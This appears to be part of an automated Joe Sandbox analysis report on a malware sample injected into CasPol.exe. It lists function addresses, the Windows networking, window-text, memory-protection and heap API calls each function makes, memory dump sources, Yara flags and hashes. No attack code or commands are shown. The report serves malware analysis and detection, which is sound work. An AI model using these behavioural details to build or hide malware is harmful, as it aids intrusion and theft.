                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CloseOpenQueryValue
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3677997916-0
                                                                                                                                                                                                                                  • Opcode ID: e297991b72ec1606279c96c89a25a7ac8737aea41b7b6b8683e2e1c686c69e22
                                                                                                                                                                                                                                  • Instruction ID: 2a31b93e49ffe9e6f23ef690bd11c8afd6de107f9352384350bf23698ee7218d
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e297991b72ec1606279c96c89a25a7ac8737aea41b7b6b8683e2e1c686c69e22
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 46E06531405234BBDF314BA2AD0DDDB7FACEF16BA17004061BC09A2251D2658E50E6E8
                                                                                                                                                                                                                                  Function 00409517 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 64COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _wcslen
                                                                                                                                                                                                                                  • String ID: xAG
                                                                                                                                                                                                                                  • API String ID: 176396367-2759412365
                                                                                                                                                                                                                                  • Opcode ID: 3cd24ee7cf2bbd971f19c3cfa9fc21255a7d7322a241340b9fd7b504d1626de8
                                                                                                                                                                                                                                  • Instruction ID: 4b5f0267b16b6d1f94f05398eea60063c36f9fdec9e789d07f1c8464d26cb595
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3cd24ee7cf2bbd971f19c3cfa9fc21255a7d7322a241340b9fd7b504d1626de8
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 751193325002049FCB15FF66D8968EF7BA4EF64314B10453FF842622E2EF38A955CB98
                                                                                                                                                                                                                                  Function 100050B0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 60COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • std::_Xinvalid_argument.LIBCPMT ref: 10005126
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3869010303.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868935399.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3870622310.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Xinvalid_argumentstd::_
                                                                                                                                                                                                                                  • String ID: string too long
                                                                                                                                                                                                                                  • API String ID: 909987262-2556327735
                                                                                                                                                                                                                                  • Opcode ID: eaa0f217be8f3647f415baa461963154c0a712c6ea737dd33bf379e98b84d204
                                                                                                                                                                                                                                  • Instruction ID: 95843a031e05dac2a709eefcd5697d94da0e28df2c028df6d7444b4865a14f8d
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: eaa0f217be8f3647f415baa461963154c0a712c6ea737dd33bf379e98b84d204
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B101B9322007445AF731CD4C988165FF3E9EBD12F5B760E1FE69197545D7736C4082A5
                                                                                                                                                                                                                                  Function 0041A945 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 16COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GlobalMemoryStatusEx.KERNEL32(?), ref: 0041A959
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: GlobalMemoryStatus
                                                                                                                                                                                                                                  • String ID: @
                                                                                                                                                                                                                                  • API String ID: 1890195054-2766056989
                                                                                                                                                                                                                                  • Opcode ID: 6a5e85952f382d12afcc854e62baf2dc0b8e461fb7fe04101b075e185c2318ef
                                                                                                                                                                                                                                  • Instruction ID: dd145fffdacd7bda74fa2c6e5abe56fe406d4b7e613986be5c07feff288e4f4e
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6a5e85952f382d12afcc854e62baf2dc0b8e461fb7fe04101b075e185c2318ef
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EFD067B99013189FCB20DFA8E945A8DBBF8FB48214F004529E946E3344E774E945CB95
                                                                                                                                                                                                                                  Function 0044B9BE Relevance: 3.0, APIs: 2, Instructions: 44memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0044B9DF
                                                                                                                                                                                                                                    • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00433627,?,?,00402BE9,?,00402629,00000000,?,00402578,?,?), ref: 00446B31
                                                                                                                                                                                                                                  • RtlReAllocateHeap.NTDLL(00000000,?,00000000,?,0000000F,?,00431FD7,00000000,0000000F,0042EA3D,?,?,00430AA6,?,00000000), ref: 0044BA1B
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AllocateHeap$_free
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1482568997-0
                                                                                                                                                                                                                                  • Opcode ID: d76ce5d9e4c682b15a99abc110236e8d1a2fbccdd24d1d48a07619e1950cdef4
                                                                                                                                                                                                                                  • Instruction ID: 12956794463f81a5c067cbc08b9f94d22fea268b9007f3edb04f63306941b305
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d76ce5d9e4c682b15a99abc110236e8d1a2fbccdd24d1d48a07619e1950cdef4
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D6F0F67210051167FF212A27AC01B6B2B2CDFC27B1F15012BFA18AA292DF6CCC0191EE
                                                                                                                                                                                                                                  Function 0041BC76 Relevance: 3.0, APIs: 2, Instructions: 41windowCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • FormatMessageA.KERNEL32(00001100,00000000,00000000,00000400,0040440B,00000000,00000000,00475B70), ref: 0041BC9E
                                                                                                                                                                                                                                  • LocalFree.KERNEL32(0040440B,0040440B,?,?,?,?,?,?,?,?,0040440B), ref: 0041BCC4
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: FormatFreeLocalMessage
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1427518018-0
                                                                                                                                                                                                                                  • Opcode ID: f72e3bc0a7bb61b5cd33225468eae17007f29defc5327e617253ce5263887c60
                                                                                                                                                                                                                                  • Instruction ID: 3eb85724c12076c4d2eca72925feb3a8121d4a7150c9d5d782cbd246f65a5107
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f72e3bc0a7bb61b5cd33225468eae17007f29defc5327e617253ce5263887c60
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 29F0C870B00105B6CF08A7A6DC4ADFF767DDB80305B10003FB502B21D1EE789E05D658
                                                                                                                                                                                                                                  Function 004041F1 Relevance: 3.0, APIs: 2, Instructions: 40networkCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • socket.WS2_32(00000002,00000001,00000006), ref: 00404212
                                                                                                                                                                                                                                    • Part of subcall function 00404262: WSAStartup.WS2_32(00000202,00000000), ref: 00404277
                                                                                                                                                                                                                                  • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404252
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CreateEventStartupsocket
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1953588214-0
                                                                                                                                                                                                                                  • Opcode ID: 854d00471859da485f7a9b00171063840124e4cdae7de36f8ad07afc2a8c10ec
                                                                                                                                                                                                                                  • Instruction ID: 6d5c4ce7eefecebe47fda3b025552a79fd8a61a73b62065855ea20d17e135052
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 854d00471859da485f7a9b00171063840124e4cdae7de36f8ad07afc2a8c10ec
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A20171B05087809ED7358F38B8456977FE0AB15314F044DAEF1D697BA1C3B5A481CB18
                                                                                                                                                                                                                                  Function 0043360D Relevance: 3.0, APIs: 2, Instructions: 38COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00433DE7
                                                                                                                                                                                                                                    • Part of subcall function 00437BD7: RaiseException.KERNEL32(?,?,?,>C,00000000,00000000,?,?,?,?,?,?,00433E09,?,0046D5EC), ref: 00437C37
                                                                                                                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00433E04
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Exception@8Throw$ExceptionRaise
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3476068407-0
                                                                                                                                                                                                                                  • Opcode ID: 02f9a842f842a715d987613c720c18d86e9d620b05cc95bf3092e1ce2b61825f
                                                                                                                                                                                                                                  • Instruction ID: 1b32a2814776e74a5aaecdac66354fa275a8f3c838098619b8de34dc4906cb01
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 02f9a842f842a715d987613c720c18d86e9d620b05cc95bf3092e1ce2b61825f
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 33F02B30C0020D77CB14BEA5E80699D772C4D08319F20923BB920915E1EF7CEB05858D
                                                                                                                                                                                                                                  Function 1001500E Relevance: 3.0, APIs: 2, Instructions: 33COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 10019622: GetEnvironmentStringsW.KERNEL32 ref: 1001962B
                                                                                                                                                                                                                                    • Part of subcall function 10019622: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1001964E
                                                                                                                                                                                                                                    • Part of subcall function 10019622: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 10019674
                                                                                                                                                                                                                                    • Part of subcall function 10019622: _free.LIBCMT ref: 10019687
                                                                                                                                                                                                                                    • Part of subcall function 10019622: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 10019696
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 10015054
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 1001505B
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3869010303.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868935399.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3870622310.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _free$ByteCharEnvironmentMultiStringsWide$Free
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 400815659-0
                                                                                                                                                                                                                                  • Opcode ID: 2006d39639fdc53c6242e61a0ac44cce930d3df2725ed3ebadaa7679f546fc9c
                                                                                                                                                                                                                                  • Instruction ID: 431c400d3b94b662dfef914a8368fe2aad44e336de9d4be97534e9408a9559a8
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2006d39639fdc53c6242e61a0ac44cce930d3df2725ed3ebadaa7679f546fc9c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BBE0E52A90595181D2B2D2796C51A0E3340EFC9777BED0329F9108F1C2DE75D8C205E2
                                                                                                                                                                                                                                  Function 0041AC52 Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetForegroundWindow.USER32 ref: 0041AC74
                                                                                                                                                                                                                                  • GetWindowTextW.USER32(00000000,?,00000100), ref: 0041AC87
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Window$ForegroundText
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 29597999-0
                                                                                                                                                                                                                                  • Opcode ID: 8a79a7386f37e374dce250e4fcdef39063f35a229190475e51bbbfed219b13a7
                                                                                                                                                                                                                                  • Instruction ID: 3cf16c2a8257e52241c70e3f2477159e0ff99a2dafdd86ddfb3cfc0a4d760bbd
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8a79a7386f37e374dce250e4fcdef39063f35a229190475e51bbbfed219b13a7
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 56E04875A0031467EB24A765AC4EFDA766C9704715F0000B9BA19D21C3E9B4EA04CBE4
                                                                                                                                                                                                                                  Function 00413F9A Relevance: 3.0, APIs: 2, Instructions: 21networkCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • getaddrinfo.WS2_32(00000000,00000000,00000000,00471B28,00474358,00000000,00414240,00000000,00000001), ref: 00413FBC
                                                                                                                                                                                                                                  • WSASetLastError.WS2_32(00000000), ref: 00413FC1
                                                                                                                                                                                                                                    • Part of subcall function 00413E37: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00413E86
                                                                                                                                                                                                                                    • Part of subcall function 00413E37: LoadLibraryA.KERNEL32(?), ref: 00413EC8
                                                                                                                                                                                                                                    • Part of subcall function 00413E37: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00413EE8
                                                                                                                                                                                                                                    • Part of subcall function 00413E37: FreeLibrary.KERNEL32(00000000), ref: 00413EEF
                                                                                                                                                                                                                                    • Part of subcall function 00413E37: LoadLibraryA.KERNEL32(?), ref: 00413F27
                                                                                                                                                                                                                                    • Part of subcall function 00413E37: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00413F39
                                                                                                                                                                                                                                    • Part of subcall function 00413E37: FreeLibrary.KERNEL32(00000000), ref: 00413F40
                                                                                                                                                                                                                                    • Part of subcall function 00413E37: GetProcAddress.KERNEL32(00000000,?), ref: 00413F4F
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Library$AddressProc$FreeLoad$DirectoryErrorLastSystemgetaddrinfo
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1170566393-0
                                                                                                                                                                                                                                  • Opcode ID: de7c912f5844d1f7c2d429620844517faabbfd26de99632591fe9930316e04d8
                                                                                                                                                                                                                                  • Instruction ID: 9c65b6197a0e8ce5e429e224625e4c370c9a1848c9e97f9a588a6d75e163472b
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: de7c912f5844d1f7c2d429620844517faabbfd26de99632591fe9930316e04d8
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4ED05B326406216FB310575D6D01FFBB5DCDFA67617150077F408D7110D6945D82C3AD
                                                                                                                                                                                                                                  Function 004106D3 Relevance: 1.6, APIs: 1, Instructions: 61memoryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • VirtualProtect.KERNEL32(?,00410B02,?,00000000,?,00000000,00000000,00410891), ref: 0041075D
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ProtectVirtual
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 544645111-0
                                                                                                                                                                                                                                  • Opcode ID: 1f5f5bcb50df5eab6b4ca8934853e6c5058cb0001586a28dc2c421d47bf62857
                                                                                                                                                                                                                                  • Instruction ID: f15b865ef06e6e56f0e3155fe6c262580cd03049418ed3f125d30449dfe24c6e
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1f5f5bcb50df5eab6b4ca8934853e6c5058cb0001586a28dc2c421d47bf62857
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0B11CE72700101AFD6149A18C880BA6B766FF80710F5942AEE115CB292DBB5FCD2CA94
                                                                                                                                                                                                                                  Function 00446AFF Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00433627,?,?,00402BE9,?,00402629,00000000,?,00402578,?,?), ref: 00446B31
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AllocateHeap
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1279760036-0
                                                                                                                                                                                                                                  • Opcode ID: 9bddc84dc8664baa6f7cbd2250fb2f50dd1e52b915d866c7822d6cfd0d1e4f3c
                                                                                                                                                                                                                                  • Instruction ID: 23017b4f7b15ec8d1e6c8205d578d5100ba2a3a3bb6c043e3f5ab96588fe2cc9
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9bddc84dc8664baa6f7cbd2250fb2f50dd1e52b915d866c7822d6cfd0d1e4f3c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 16E0E5312002B556FB202A6A9C05F5B7A88DB437A4F160133AC09D62D0CF5CEC4181AF
                                                                                                                                                                                                                                  Function 10015A9F Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • RtlAllocateHeap.NTDLL(00000000,1000A5B7,?), ref: 10015AD1
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3869010303.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868935399.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3870622310.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AllocateHeap
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1279760036-0
                                                                                                                                                                                                                                  • Opcode ID: f87b84874486757e2c47ac47ea9f60d9c82a37147b210451a2933aa9f661e901
                                                                                                                                                                                                                                  • Instruction ID: def42a02582f0e9aca0d42380fcba57ce1fa30504e24a63dc847fc71142e9800
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f87b84874486757e2c47ac47ea9f60d9c82a37147b210451a2933aa9f661e901
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BBE06535281221E6E721F6A69D85B4B3698DF416F2F6B0220ED149E490DB73DC8182E2
                                                                                                                                                                                                                                  Function 00404262 Relevance: 1.5, APIs: 1, Instructions: 15networkCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • WSAStartup.WS2_32(00000202,00000000), ref: 00404277
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Startup
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 724789610-0
                                                                                                                                                                                                                                  • Opcode ID: 95a2dab67d29c7ac03eac8c0eb79289a66407e1e5cc97b6f0f8b459783d59ee5
                                                                                                                                                                                                                                  • Instruction ID: eac2355bac846bce9fd0ddf676e945afe2a4b646382637a0be3cadb4b1fbcda1
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 95a2dab67d29c7ac03eac8c0eb79289a66407e1e5cc97b6f0f8b459783d59ee5
